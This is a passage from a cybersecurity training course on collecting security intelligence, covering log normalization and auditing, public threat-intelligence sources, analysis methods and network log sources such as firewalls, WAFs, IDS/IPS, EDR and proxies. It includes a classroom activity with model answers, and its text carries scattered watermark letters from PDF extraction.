enhancing the readability and usefulness of logs. Data in logs from different types of hosts can be
normalized to present information in a standard layout that will be easier for an analyst or analysis
software to read and compare. Data from different sources can be aggregated into a single form or
view to provide a clearer picture of the context and timing of events that occurred in different parts
of the system.

For example, an analyst might need to compare logs where information is recorded in different time
zones. If the time zones could be normalized into a single, primary zone, then it would save the
analyst a great deal of time and effort attempting to cross-reference the different timings for each
entry. Likewise, normalization techniques can ensure the consistency of field names. For instance,
you might have two logs, one that records an "event type" and one that records an "event ID." An
analyst might be confused and assume these two attributes are different, but if they actually describe
the same basic thing, you can normalize the field name to eliminate that confusion. Another
enrichment tactic is to resolve IP addresses in logs to known network hostnames to make it easier
for the analyst to identify what host the entry is referring to.
e
Because of the sheer number and volume of logs, it is most efficient to use automation tools to
ut
quickly format and combine logs with different content, formats, and timestamps. The security
practitioner may develop some of these tools from scratch, or may use a commercial or open source
tool, which may include log viewers, formatters, and conversion tools; visualization tools that
ib
present event data in a graphical format; or features provided by host-based intrusion detection
system (HIDS) products, security information, and SIEM software.
tr
Log Auditing
is
Log Auditing Log auditing is the process of evaluating an organization's logging architecture to determine if it is
meeting a set of predefined criteria. Log auditing is an important part of the intelligence collection
D
and analysis process, as it enables the organization to validate whether or not its logs are providing
value to the business, integrating with the overall risk management framework, and complying with
any applicable laws or regulations.
or
Auditing is typically a distinct discipline from the analyst or incident responder role, and is often
fulfilled by an external party. This ensures there is no conflict of interest, and that the evaluation is
more likely to be objective and free of bias (whether intentional or not). There are many techniques
e
that go into log auditing, and a truly in-depth discussion could fill an entire course.
Here are just a few examples of log auditing techniques:
at
• Source validation: In many organizations, logs are aggregated and sent over the network to an
appliance for further correlation and analysis. However, it's still important that a particular log
lic
can be traced back to its source for non-repudiation purposes. The system that created the log
should not be disassociated from that log, or its timeline may be compromised and its contents
unusable. An auditor might validate the source of a log through the use of digital signatures.
up
• Integrity verification: Like validating the source of a log, an auditor should be able to accurately
verify a log has not been tampered with. Attackers attempt to erase or falsify log data to cover
their tracks and confuse security professionals. Auditors can also verify log integrity through the
use of digital certificates, or they can use message authentication codes (MACs).
D
• Evidence collection: In order for an auditor to present a compelling case for whether or not a
logging architecture is in compliance, they need to be able to extract useful evidence from the
ot
logs. This evidence will influence the auditor's assertions and recommendations. The type of
evidence collected will vary greatly depending on the criteria being audited, but in general, the
auditor will be looking for events that indicate system misconfiguration, least-privilege violations,
N
improper or obsolete cryptographic implementations, poor error handling, and more.
Publicly Available Information

o
D
Publicly Available There is a wide variety of publicly available sources of security intelligence. The following table lists
Information some of the major ones.

Public Sources of Description

Free registries Free public registries, sponsored by organizations such as the U.S.
Department of Homeland Security and the MITRE Corporation, provide
public access to a collection of known threats, which are updated as soon
as they are made public.
Examples include:
e
• Open Vulnerability and Assessment Language (OVAL)
repositories provide a forum for participants to store and discuss a
ut
range of security content encoded in various standard XML formats
to represent system information, such as vulnerabilities,
configuration management, patch management, and policy
ib
compliance. OVAL® is international in scope, with content hosted by
CIS, MITRE, NIST, Cisco, various Linux vendors, and other
tr
organizations, and is funded by the U.S. Department of Homeland
Security.
is
Website: oval.mitre.org
• Common Weakness Enumeration (CWE™), sponsored by
MITRE, provides a catalog of software weaknesses and vulnerabilities,
D
with the goal of reducing security-related software flaws and creating
automated tools to identify, correct, and prevent such flaws.
Website: cwe.mitre.org
or
• The United States Computer Emergency Readiness Team (US-
CERT) provides four products in the National Cyber Awareness
System, which offer a variety of information for users with varied
e
technical expertise. Current Activity provides recent information
at
about high-impact security activity. Alerts provide timely information

about current security issues, vulnerabilities, and exploits. Bulletins
provide weekly summaries. Analysis Reports provide in-depth analysis
lic
on new and evolving threats.

Website: https://www.us-cert.gov/ncas
• Common Attack Pattern Enumeration and Classification
up
(CAPEC™) provides a free public database of common attack

patterns.
Website: https://capec.mitre.org
D
Commercial registries Some organizations provide security intelligence as a commercial service

and monitoring offering. Some primarily repackage information coming from free public
ot
services registries, while others provide data that may not be found in the free
public registries. For example, Recorded Future claims its Intelligence
Graph is able to analyze dynamic data from billions of entities all over the
N
world.
o
D

Public Sources of Description

Security blogs and Intended more for human readers rather than computers, sources such as
social media blogs, discussion forums, and groups geared toward information security
provide insights and reporting on the latest trends in software
vulnerabilities and cybersecurity issues.
Examples include:
e
• Schneier on Security: https://www.schneier.com
• Krebs on Security: https://krebsonsecurity.com
ut
• Dark Reading: https://www.darkreading.com
• Threatpost: https://threatpost.com
ib
• Fortinet blog: https://www.fortinet.com/blog
• Naked Security: https://nakedsecurity.sophos.com
• Security Boulevard: https://securityboulevard.com
tr
• Securosis blog: https://securosis.com/blog
is
Security mailing lists, You can subscribe to mailing lists to receive instant or digest updates on
newsgroups, and vulnerabilities and trends. Some lists are geared more toward attackers
newsfeeds than security specialists, but the information from these lists can tip you
D
off to potential problems.
Examples include:
or
• National Cyber Security Centre (NCSC) reports: https://
www.ncsc.gov.uk/index/report
• Usenet newsgroups such as alt.security, comp.risks,
e
comp.security.announce, and comp.virus
• Internet Storm Center Handlers Diary: https://isc.sans.edu
at
Announcements by Major software vendors provide announcements of known security issues

product vendors in their products. Many enable you to subscribe to announcements
lic
through Rich Site Summary (RSS) newsfeeds, mailing lists, and so forth.
Examples include:
up
• Microsoft Security Response Center: https://

www.microsoft.com/en-us/msrc
• Apple security announcements: https://lists.apple.com/mailman/
listinfo/security-announce and available as a newsfeed at https://
D
lists.apple.com/rss/security-announce.rss
• Cisco: https://tools.cisco.com/security/center/rss.x?i=44
ot
• Debian: https://www.debian.org/security
Security Information Standards

N
Because security intelligence originates from many different sources and it can be difficult to
analyze, various initiatives are underway to provide that information in standard formats that can be
o
read by computers as well as humans. Many of these standards are associated with various registries
that provide security information.
D
Examples include:
• OVAL
• Malware Attribute Enumeration and Characterization (MAEC™)
• Structured Threat Information Expression (STIX™)
• Trusted Automated Exchange of Indicator Information (TAXII™)
• Common Weakness Scoring System (CWSS™)

• Common Weakness Risk Analysis Framework (CWRAF™)

• Policy Language for Assessment Results Reporting (PLARR)
• OpenIOC framework
• CAPEC
• IODEF RFC 5070—The Incident Object Description Exchange Format
Collection and Reporting Automation
e
Collecting cybersecurity intelligence has traditionally involved assembling a loose collection of tools Collection and Reporting
and information sources, such as system logs, NBAD, risk and compliance management, and Automation
ut
network forensics. With the processing capabilities of current cloud computing and big data SIEMs will be discussed
analytics tools, processing the large variety and quantity of data needed to provide instant more extensively in a
identification and reporting of security concerns is not only possible, but is also available as a later lesson.
ib
commercial product through the latest generation of security information and event management
(SIEM). SIEMs are available as software applications, network appliances, or managed cloud-based
tr
solutions.
Whereas early SIEMs required extensive manual configurations and were not much more
is
sophisticated than a homemade solution, recent products are quite helpful in automating the task of
data collection and reporting. They also provide an extensive library of connectors to automate data
D
collection from various sources, analytics tools optimized for security intelligence, reporting
templates, and so forth. SIEMs not only automate data collection, but they are very useful in
correlating data collected from different sources.
Data Retention or
To meet various compliance and regulatory requirements, organizations may be legally bound to Data Retention
e
retain certain types of data for a specified period. On the other hand, some requirements may
at
prevent you from retaining certain types of data.

It is not practical for individual administrators to read and interpret every regulation or policy
affecting your organization, so staff knowledgeable in these matters should define specific company
lic
policies for each type of data—such as firewall logs, intrusion detection logs, system logs,
application logs, and so forth—and provide them to staff to ensure compliance. Policies should also
include guidelines on when and how to dispose of various types of data, and how to preserve
up
original copies of log files, if necessary. Organizations should also have policies to deal with the
inadvertent disclosure of sensitive information.
What is meant by "data retention" varies by industry, and there are many organizations such as the
D
National Institute of Standards and Technology (NIST) that provide guides to help organizations
define appropriate retention periods. There are also industry-specific groups such as EDRM that
provide a more specialized service. It is important to include legal counsel in your organization's
ot
data retention policies, as not meeting requirements can bring about unwanted liability.
Analysis Methods
N
An important part of building a data collection and analysis platform is employing a variety of Analysis Methods
o
monitoring and analysis methods. One method may be more effective than another in certain
circumstances, so selecting a comprehensive toolset that incorporates several of these methods is
D
usually the best approach.

• Trend analysis is the process of detecting patterns within a data set over time, and using those
patterns to make predictions about future events. Applied to security intelligence, trend analysis
can help you to judge that specific events over time are likely related, and possibly indicate that
an attack is imminent. It can also help you avoid unforeseen negative effects that result from an
attack if you can't stop the attack altogether. Aside from predicting future events, trend analysis
also enables you to review past events through a new lens. For example, when an incident

happens, you'll usually attribute it to one cause. However, after time has passed and you gather
more intelligence, you may gain a new perspective and realize the nature of the cause is different
than you had originally thought.
• Correlation analysis is the process of identifying dependent relationships between different
forms of information that indicate some larger pattern of behavior. Correlation analysis is able to
identify activity that may not be observable when considering information in isolation; only until
that information is put in context with other information can a clearer picture of events emerge.
For example, a failed login attempt by a single account may not mean much, but if you correlate
that login attempt with a source IP address that has made many failed login attempts across
e
multiple accounts recently, you'll have a better understanding of what's happening.
• Anomaly analysis is the process of defining an expected outcome or pattern to events, and then
ut
identifying any events that do not follow these patterns. This is useful in tools and environments
that enable you to set rules, like an IDS—if network traffic or host-based events fail to conform
ib
to the rules, then the system will see this as an anomalous event. Anomaly analysis is useful
because you don't need to rely on known malicious signatures to identify something unwanted in
your organization, as this can lead to false negatives.
tr
• Behavioral analysis is the process of identifying the way in which an entity acts, and then
reviewing future behavior to see if it deviates from the norm. Behavioral analysis differs from
is
anomaly analysis in that the latter prescribes the baseline for expected patterns, and the former
records expected patterns in reaction to the entity being monitored. For example, a banking
D
system may track the average dollar value of withdrawals a customer makes; if the latest
withdrawal far exceeds the average, the system may conclude the account was hijacked and
freeze the customer's account.
•
or
Heuristic analysis is the process of identifying the way in which an entity acts in a specific
environment, and making decisions about the nature of the entity based on this. Rather than only
focus on the potentially unwanted entity, heuristic systems will consider how that entity may
negatively impact its surrounding context. Using various metrics, the heuristic system may
e
conclude that a particular entity is or is not a threat to the environment, and react accordingly.
For example, some anti-malware solutions will run software on the host operating system in a
at
sandbox environment to determine the effect it has on the system. If it identifies negative effects,
it may classify the software as malicious.
lic
Note: Because monitoring is a key component of these methods, they are also referred to as
"anomaly monitoring," "behavioral monitoring," etc.
up
Guidelines for Deploying a Security Intelligence Collection and

Analysis Platform
D
Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
ot
Guidelines for Follow these guidelines when deploying a security intelligence collection and analysis platform.
Determining Which Data
N
to Collect for Security Determine Which Data to Collect for Security Intelligence
Intelligence
To determine which data you should include in your security intelligence collection process:
o
• Identify risks: Risk management should be a major part of your intelligence collection process.
Be sure to identify specific risks that will have an impact on your organization.
D
• Prioritize risks: As part of the risk management process, prioritize the risks. You will likely have
to make some decisions regarding which data you will collect and process, so knowing which
threats you need to focus on will help you plan.
• Identify potential data sources: Starting with the most critical risks and working your way
through the list, identify every source of information that would be affected by an attack—
before, during, and after the attack, within your systems and outside your systems, within the
network (such as devices like routers and firewalls) and within hosts (such as servers, clients, and

mobile devices). Consider existing sources, such as system logs, as well as sources you might
need to set up in advance, such as packet capture or logging devices.
• Narrow your focus: Review each data source and identify its value. Compare its value to the
cost of storage, processing, and analysis. Determine if the information is duplicated elsewhere at
a lesser cost or whether another source will provide an earlier warning or more useful
information. Select the information sources that meet your requirements. Identify the data
amount, frequency, and duration you need to capture to provide an optimum ratio of cost and
value.
e
Determine Which Fields You Should Log
In many cases, you can custom-configure logging tools to determine what sort of information is Guidelines for
ut
logged. It is typically not feasible to capture everything possible, since it may seriously diminish the Determining Which
processing speed and may fill logs too quickly. So you need to be selective. In general, you should Fields You Should Log
ib
try to capture at least the five Ws:
• When the event started (and ended, if relevant).
• Who was involved in the event.
tr
• What happened, with specific detail to distinguish the nature of the event from other events.
is
• Where it happened—on which host, file system, network port, and so forth.
• Where the event originated (for example, a session initiated from an outside IP address over a
virtual private network [VPN] connection).
D
Consider pointing out
Configure Logging Systems Based on Their Impact that military
or
The NIST Special Publication 800-92, Guide to Computer Security Log Management, recommends that
you configure logging systems based on the priority of the systems they document, as described in
the example guidelines shown in this table. Some industry-specific regulations also provide
requirements on how long relevant data and logs should be held.
organizations will often
need to retain data for
longer periods than what
is listed in this table.
e
Guidelines for
Configuring Logging
Category Low-Impact Moderate-Impact High-Impact
at
Systems Based on Their

Systems Systems Systems
Impact
How long to retain log data. 1 to 2 weeks 1 to 3 months 3 to 12 months
lic
How often to rotate logs. Optional (if Every 6 to 24 hours Every 15 to 60

performed, at least or every 2 to 5 MB minutes or every 0.5
every week or every to 1.0 MB
up
25 MB)
If the organization requires the Every 3 to 24 hours Every 15 to 60 At least every 5
system to transfer log data to minutes minutes
D
the log management

infrastructure, how frequently
that should be done.
ot
How often log data needs to be Every 1 to 7 days Every 12 to 24 At least 6 times a
analyzed locally (through hours day
N
automated or manual means).

Whether log file integrity Optional Yes Yes
o
checking needs to be
performed for rotated logs.
D
Whether rotated logs need to Optional Optional Yes

be encrypted.
Determine Which Events Should Prompt an Alert Guidelines for

Some events should be captured because they indicate an attack currently taking place. Others Determining Which
provide information that will be useful for investigating an attack or performing later forensic Events Should Prompt
an Alert

analysis. As you configure your logging systems, identify which events should trigger an alert. This
table provides some examples, although your own criteria may vary.
Events That Should Trigger an Alert Events That Provide Useful Data for Later
Analysis
Faults affecting system operations. General system status messages.

System changes that will result in a security or General system changes.
availability problem.
e
Attacks that are successful. Attacks that fail, including reconnaissance
ut
probes.
Reconnaissance probes or attacks with a good Low-impact probes and attacks.
chance of success.
ib
Failed logins. Any login.
tr
Note: Deciding how aggressive to be in creating alerts depends on how good your log analysis
is
tools are and how much space you have to store logs, as well as policy and regulatory
requirements.
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 7-1
Deploying a Security Intelligence Collection and
Analysis Platform
e
Scenario
ut
As of now, Develetech's intelligence collection and analysis efforts are not well unified, which has let
certain incidents slip past its defenses. Upper management is not pleased with the consequences of
these incidents. So, the Chief Information Security Officer (CISO) of Develetech wants to develop a
ib
new collection and analysis platform that will enable the security team to extract more useful,
actionable data from its assets. This will hopefully improve the process and bolster the security
tr
team's ability to protect the business. However, the CISO needs your help in developing the
platform.
is
Activity: Deploying a
The CISO is trying to convince other C-level personnel that Develetech needs Collection and Analysis
D
1.
Platform
to put an end to reactive security and start adopting a more proactive
approach to defending the organization.
or
What are the advantages of CSM that could convince management to offer
their financial backing?
e
A: Answers may vary, but with CSM, the organization is able to constantly survey all of its assets for
any behavior that induces risk. Data collected on this behavior is both up to date and actionable;
at
problems are detected immediately, and can likewise be contained as quickly as possible to
minimize damage. These CSM systems can also be configured and customized to suit the
organization's needs, even as business operations or the threat landscape change. Ultimately, a
lic
CSM can drastically reduce the risk of an attack going unidentified for a long period of time due to
stagnant collection processes.
The CISO would also like your input as far as which data sources to draw
up
2.
from as part of the new collection platform.
What steps would you take to determine which sources to choose for data
D
collection?
A: Answers may vary, but the organization should first identify the major risks it faces. The risk
ot
assessment team then needs to prioritize those risks by measuring the most likely risks against
the risks that will cause the most damage. This will enable the intelligence collection team to focus
on data that is most relevant to mitigating those risks. The collection team will review these
N
relevant data sources for components like alerts, logs, captures, etc., that can provide insight into
the risk. Lastly, the collection team will narrow their focus to the most actionable data, and attempt
to eliminate redundant data or data that does not provide optimal value.
o
3. When it comes to processing disparate types of data, what challenges will the
D
collection and analysis platform face?

A: Answers may vary. Log files come in many different formats based on different standards—or
sometimes, no standards at all. Log files can be generated in CSV format, syslog format, XML,
and much more. Some formats are open source and easy to work with, whereas some are
proprietary and require specific software. Logs may also be encoded using different schemes,
such as ANSI versus Unicode. The time-keeping element of an appliance may not be
synchronized with other appliances, making it difficult to correlate data based on a time factor.

TOPIC B
Collect Data from Network-Based Intelligence
Sources
You've deployed various elements in a security intelligence collection and analysis platform, which
e
will help you organize and analyze large volumes of potentially useful data. Now you can begin
collecting intelligence from network resources.
ut
Network Device Configuration Files
ib
Network Device Network devices like routers and switches can often be configured through the use of discrete files.
Configuration Files These files provide a static baseline for a device's behavior, and they can also act as a backup in case
tr
the device needs to be reset or is taken offline. Configuration files may be stored locally on the
device, but they can also be stored on a server that a management console uses to deploy
is
configuration changes to all affected devices. In either case, these configuration files can provide you
with useful data about the device's behavior.
D
For example, a router's configuration file can include its internal IP address, wide area network
(WAN) IP address, virtual local area network (VLAN) information, security services (proxies, filters,
firewalls, etc.), and much more. In the event of a security incident, this information can be valuable
or
as you correlate a device's settings with suspicious traffic. A lapse in the device's firewall, for
instance, may help you understand why the traffic was able to pass through the router unabated and
onto hosts in the subnet. What's more, an attacker could attempt to adjust these configuration files
directly. By collecting data about this modification, including timing and differences from the
e
baseline, you can help identify the attacker's goals or planned vectors of attack.
at
lic
up
D
ot
N
o
D
Figure 7-3: Part of a router's configuration file. Note how it sets specific behavior, like its WAN
address.
Lesson 7: Collecting Cybersecurity Intelligence | Topic B

Network Device State Data

A network device's state data also prescribes its behavior, but it is typically not manually configured. Network Device State
State data is mostly driven by the device's inherent behavior, like a switch always keeping content- Data
addressable memory (CAM) tables to funnel traffic to a specific destination. Still, attackers may be
able to adjust this data to facilitate easier network traversal, like through a pivot or by moving
laterally. The following table lists some of the most important elements that record state data on
network devices.
e
State Data Element Description
ut
Routing tables Routing tables include destination addresses, the gateway required to
reach those destinations, the local interface that communicates with the
gateway, and metrics that measure the efficiency of each route. A
ib
suspiciously configured route can help you identify an attack. For
example, a routing table that takes excessively long paths could consume
network bandwidth and cause delays to disrupt service.
tr
CAM tables CAM tables are used by switches to forward packets to specific interfaces
is
rather than broadcasting traffic to all destinations as in a hub. They
essentially map MAC addresses to ports. An attacker connected to the
switch may be able to alter the CAM table to funnel all traffic to their
D
device, effectively acting as a man in the middle.
NAT tables Network address translation (NAT)-enabled routers contain tables that
or
map private IP addresses to the public address, as well as TCP and UDP
ports. This enables outgoing transmissions to use the public address and
incoming transmissions to find the correct private address it originated
from. Therefore, a NAT table can help you determine if communications
e
from internal to external, or vice versa, are being tampered with.
at
DNS cache Domain Name System (DNS) caches improve the efficiency of name
servers in that they reduce the overhead of constant resolution requests.
The cache stores an IP address and its corresponding domain name for
lic
easy retrieval. DNS cache data may point to malicious entries.

ARP cache As you've seen, the Address Resolution Protocol (ARP) cache maps
internal IP addresses to MAC addresses. Multiple IP addresses matched
up
to a single MAC address can indicate a poisoning attempt.
Switch and Router Logs

D
Switches and routers can log both incoming and outgoing traffic. You can typically control the Switch and Router Logs
ot
verbosity of these logs, including filtering on specific actions (e.g., dropped and accepted
connections). Most routers/switches will at the very least include the destination address and source
address as part of the transmissions. These devices may also record the following information:
N
• The protocol used in the transmission.

• The port number or service name used in the transmission.
o
• Whether the transmission was dropped, accepted, or rejected.

• The priority metric of each transmission.
D
• The time of transmission.

Because switches and routers serve a great deal of traffic in a network, it can be difficult to find
useful or actionable information in their logs that can't also be found with more specialized devices.
Nevertheless, they can still provide you with a holistic view of traffic that is both inbound and
outbound from the key communication points in your network. In many organizations, switch and
router activity is centralized rather than written to separate log files on each device, as the number of
such devices can make it infeasible to examine individual logs.

e
ut
ib
tr
is
D
or
Figure 7-4: A router's log for incoming traffic.
e
Note: Monitoring capabilities may differ in some router and switch deployments—some may
not monitor traffic at all.
at
Wireless Device Logs

lic
Wireless Device Logs Wireless devices like wireless access points (WAPs) are not necessarily routers, but their logging
information often reflects a similar type and amount of traffic. The main difference is that some
up
WAPs also record wireless-specific information, like the channel and frequency used during
communication. This can help administrators diagnose interference, noise, or coverage problems.
Likewise, collecting this wireless data can assist security personnel in identifying service disruption
D
attacks, as wireless networking is less stable than wired networking and may be more vulnerable to
denial of service (DoS) conditions.
Linux syslogs are In large organizations, WAPs are often managed through the use of wireless local area network
ot
discussed in the next (WLAN) controllers. These controllers are able to configure the behavior of individual access points
topic. or all access points as a whole. Controllers are often integrated with Linux servers to output WAP
events as syslog data. For example, Cisco controllers enable you to specify multiple syslog servers
N
for output, and you can specify that certain messages are sent to certain servers. One administrator
may be tasked with reviewing logs with property A, and another administrator may be tasked with
reviewing logs with property B. The format of these logs follows the format of traditional Linux
o
syslogs, including a facility code and severity level for each message.
D
Firewall Logs
Firewall Logs Firewalls provide a line of defense at the network's borders to limit the types of traffic permitted to
pass in to (and possibly out of) the network based on certain rules or behavior. Because firewalls
provide such an important line of defense where a network may be most vulnerable, firewall logs
can provide a wide range of useful security intelligence, such as:

• Connections permitted or denied: Patterns within log data can help you identify holes in your
security policies. A sudden increase in rates resulting in denied traffic can reveal when attacks
were committed against your firewall.
• IDS activity: Configure the firewall with a set of IDS signatures to log attacks that occur.
• Address translation audit trail: Log network address translation (NAT) or port address
translation (PAT) to provide useful forensic data, which can help you trace the IP address of an
internal user that was conducting attacks on the outside world from inside your network.
• User activity: Produce an audit trail of security policy changes by logging firewall user
authentication and command usage.
e
• Cut-through-proxy activity: Log activity as end users authenticate and pass through the firewall
ut
to produce an audit trail of cut-through-proxy use.
• Bandwidth usage: Log each connection with its duration and traffic volume usage, which you
can break down by connection, user, department, and other factors.
ib
• Protocol usage: Log protocols and port numbers that are used for each connection, which you
can analyze statistically for patterns or anomalies.
tr
Because firewalls collect a large volume of data, you should employ a log collection tool to ensure
that data is not lost when logs roll over or are cleared within the firewall.
is
D
or
e
at
lic
up
Figure 7-5: Windows Firewall logging a ping event.
NGFWs
Next-generation firewalls (NGFWs) are modern firewalls that can function at higher layers of the
D
Open Systems Interconnection (OSI) model than traditional firewalls. Most NGFWs work all the
way up to layer 7, the application layer. This provides NGFWs with deeper inspection capabilities so
they can detect and block specific unwanted traffic, rather than blocking an entire port, protocol, or
ot
source and destination otherwise used for legitimate purposes. Some NGFWs also incorporate
machine learning for more intelligent, data-driven analysis.
N
Some examples of NGFWs include the Cisco Firepower® series, Palo Alto Networks® next-
generation firewalls, and Check Point® Next Generation Firewall.
o
Web Application Firewall (WAF) Logs

D
A web application firewall (WAF) is an application-layer firewall that can apply a set of rules to Web Application Firewall
HTTP traffic. These rules generally address web-based exploits and vulnerabilities, like SQL (WAF) Logs
injection attacks and cross-site scripting (XSS) attacks. Thus, a WAF is a more intelligent version of
the traditional firewall, and can protect web servers and clients from malicious traffic that fits known
attack signatures.

WAF logs are usually set to record an event when it trips a certain rule. Whether or not this means
the traffic is blocked is up to the administrator to configure.
Traffic that matches a suspicious or unwanted signature will typically be logged with the source and
destination addresses, why the traffic triggered an alert (what known suspicious behavior it
matched), and what action was taken (based on the configured rule).
The actual composition of the log will differ between WAF vendors, but some also include the
following useful information:
• The time of the event.
e
• The severity of the event. Not all events that trigger an alert are treated with equal suspicion.
ut
• The HTTP method(s) used in the event (e.g., a GET request).
• Any specific query used in the event.
• The specific web page path of the traffic.
ib
• More details about what kind of attack, if any, the event could indicate.
WAF Solutions
tr
Examples of WAFs include:
is
• NAXSI: An open source solution for Unix-like systems that relies on simple rules to block the
most common types of web-based exploits.
D
• ModSecurity™: An open source solution for Linux and Windows systems. Trustwave®, the
company that maintains ModSecurity, offers a core rule set for free, but also offers a paid service
of robust and constantly updated rules.
or
• Imperva® Web Application Firewall: A proprietary solution for Windows systems. This
solution correlates a baseline of your normal web apps' behaviors with crowd-sourced threat
intelligence to determine the types of traffic to block.
e
IDS/IPS Logs
at
IDS/IPS Logs Intrusion detection systems/intrusion prevention systems (IDSs/IPSs), whether wireless (WIDS/
WIPS) or otherwise, usually have a built-in logging feature that records traffic and alerts according
lic
to how the system is configured. You should configure the system to at least log any alerts that it
generates, without logging every single non-alert event it detects. Logs can vary depending on what
signatures you've told the IDS/IPS to generate an alert from. If all the IDS does is look for port
up
scans, then your log will be very brief and to the point. If your IDS/IPS scans many different
potential threats, then your log might become more difficult to wade through.
D
ot
N
o
D
Figure 7-6: An IDS log indicating a port scan alert.
To help standardize alert information, the Security Device Event Exchange (SDEE) server is an
IDS alert format and transport protocol specification based on the Simple Object Access Protocol
(SOAP). Because it is based on SOAP, SDEE uses common web protocols (such as HTTP/HTTPS
and XML) to communicate between different types of systems, such as a Cisco device and a

Windows or Linux log collection application. While SDEE provides standard types of security
events, and filters select events to be retrieved from SDEE providers, the standard supports
extensions so devices can provide additional types of events and filters, while remaining compatible
with the overall messaging scheme.
Systems that transmit security event data to clients are called SDEE providers. The provider is
typically an IDS. SDEE providers act as HTTP servers, whereas systems that request information
from the provider (such as a log collection application) are clients. Clients initiate HTTP requests.
As with any type of web client, the SDEE client establishes a session with the server by
authenticating. Once authenticated, an ID (or a cookie, essentially) is provided to the client to verify
e
future requests, enabling a client to maintain a session state with the server. Through SDEE,
ut
security events may be retrieved through two methods: an event query (a single request), or an event
subscription (an ongoing feed of events). Communication may be conducted over HTTP with
Secure Sockets Layer/Transport Layer Security (SSL/TLS), using an implementation such as
ib
OpenSSL.
IDS/IPS Solutions
tr
Examples of IDS/IPS solutions include:
is
• Snort®: An open source IDS/IPS currently developed by Cisco that is available for Linux and
Windows systems. You can configure Snort to detect and block network traffic that matches
your own custom rule set.
D
• Zeek IDS: An open source network monitor for Unix-based systems that can function as a
network intrusion detection system/host-based intrusion detection system (NIDS/HIDS),
among other features. Zeek IDS, formerly known as Bro, includes a custom scripting language
that enables you to set detection rules and action policies.
or
• Cisco Firepower: Proprietary network security software that runs on Firepower physical
appliances. In addition to being an NGFW and anti-malware solution, Cisco markets Firepower
e
as a next-generation IDS/IPS enhanced by full-stack visibility and contextual awareness.
• Suricata: A cross-platform open source IDS/IPS solution that also supports logging of DNS,
at
HTTP, and SSL/TLS activity. Suricata comes with its own rule set language, but also supports
more advanced scripting with the Lua programming language.
lic
Endpoint Detection and Response (EDR) Logs

up
Endpoint detection and response (EDR) systems monitor various hosts on a network (i.e., EDR can be considered
endpoints) for malicious or other unwanted behavior, and then take action to protect the host(s) a host-based intelligence
against this behavior. As mentioned previously, EDR is similar to host-based intrusion detection, source, but because
but tends to incorporate more advanced analysis techniques (e.g., trend analysis, heuristics, etc.) as it data is sent to a
D
monitors an endpoint. In some EDR solutions, these advanced techniques do not replace older centralized monitoring
platform over the
signature-based analysis, but supplement it.
network, it's being
ot
EDR systems are typically agent based; specialized software is deployed on each endpoint the discussed in the
security team wishes to monitor. This agent software collects and reports data to a centralized EDR network-based
platform where it can be analyzed. If the EDR system determines an endpoint is exhibiting intelligence sources
N
unwanted behavior, the EDR system can send alerts to an administrator at a dashboard or to the topic.
user of that endpoint. Some EDR systems can take direct action and send commands to the Endpoint Detection and
endpoint in real time, like shutting it down or disconnecting its network interface to isolate an Response (EDR) Logs
o
infection.
D
EDR is a relatively recent term and at times somewhat vague. Solutions from different vendors can
vary significantly in what they do and how they do it. Still, there are some common types of host
activity that all-in-one EDR solutions tend to log, including:
• Information about running software processes.
• Network traffic patterns.
• Account login activity.
• Changes to the OS file system, configuration files, and Registry.

• Memory management and kernel operation.

• Alterations made to sensitive files.
Note: The log files produced by the EDR system are usually more complex than what the host
provides directly. For example, instead of simply recording each time a process starts and stops,
the EDR log will probably include event correlations and other relevant analytics data, like how
changes to a Registry entry affected a running process.
Proxy Logs
e
ut
Proxy Logs When used in an organizational setting, web proxies act on behalf of internal employees by
forwarding their HTTP requests to the intended destination. This is often implemented in
environments where traffic outbound for the Internet needs to comply with some administrative or
ib
security policy. In addition, proxies can reveal the exact nature of HTTP requests, including the
websites that users visit and the contents of each request. They're also useful for preventing users
from contacting known sources of malware, even if inadvertently.
tr
Proxy logs can reveal quite a bit about each and every request and response that passes through the
is
proxy, including:
• The time of the request/response.
D
• The destination website.
• The internal IP address that made the request or is the recipient of the response.
• The HTTP method used in the request/response.
or
• The exact destination path of the request.
• The length and MIME type of the request.
• The exact contents of the request/response.
e
Proxies set up to intercept or block traffic can also record the rule that a request matched when it
was either halted or denied. An administrator or security professional can use this information to
at
determine an employee's intent, be it malicious or harmless.

lic
up
D
ot
N
o
Figure 7-7: A proxy log.

D
Cloud Provider Logs

Cloud Provider Logs One of the major issues that comes with relying on a cloud service provider for software, platform,
or infrastructure needs is that you don't have a complete view into how these assets are operating.
This is the reality that comes with no longer having total control over the process or product that

you've offloaded to a third party. However, in most cases, your organization will reach an agreement
with a cloud provider that defines what types of information the provider will share, and what form
this information takes.
Many providers will, at the very least, offer audit logs to their clients. The extensiveness and
usefulness of these logs may vary, but in general, cloud audit logs enable a client organization to
verify information, such as administrative account activity (logins, service configurations, etc.) and
use of the cloud service's application programming interface (API) (automated database reads/
writes, automated deployments, etc.). Using these audit logs, you can identify any abnormal behavior
with regard to a cloud service and discover the who, what, and when of an event.
e
In addition, some providers offer general security bulletins that may be of interest to their clients.
ut
This can include everything from reporting on infrastructure security fixes, to generating reports of
suspected breaches that may impact all or specific clients. These security bulletins are typically
published on the service's official blog, sent out through mass email to clients, or made visible
ib
through clients' central administrative consoles. In addition, cloud providers may also offer threat
intelligence feeds that report on suspected threats targeting cloud services at any given time. Like
tr
more generalized threat intelligence feeds, feeds published by cloud providers can also incorporate
automated scoring mechanisms and other information that might influence an organization's
response.
is
Software-Defined Networking (SDN)
D
Software-defined networking (SDN) is an attempt to simplify the process of administrating a Software-Defined
network by separating systems that control where traffic is sent from systems that actually forward Networking (SDN)
or
this traffic to its destination. This enables a network administrator to directly program the control
systems without needing to also focus on the forwarding systems. Network administrators can more
easily manage the flow and logistics of their network, and adjust traffic on the fly based on their
e
needs.
SDN can assist the data collection process by gathering statistics from the forwarding systems and
at
then applying a classification scheme to those systems to detect network traffic that deviates from
baseline levels. This can provide you with a more robust ability to detect anomalies—anomalies that
lic
may suggest an incident. SDN therefore gives you a high-level perspective of network flow that may
not be possible with traditional network management controls.
up
Network Traffic and Flow Data

Network traffic and flow data may come from a wide variety of sources, such as web proxies, Network Traffic and Flow
routers, firewalls, network sniffers, and so forth. Any of these may provide good sources of security Data
D
intelligence. Logs from these sources can reveal anomalies, such as outages; configuration changes;
suspicious changes in traffic patterns, such as flash crowds; and other patterns of abuse.
ot
Network traffic and flow analysis tools can provide automated analysis of network traffic and flow
data, providing features such as:
• Reporting on traffic and flow, including trending patterns based on traffic generated by certain
N
applications, hosts, protocols, and so forth.

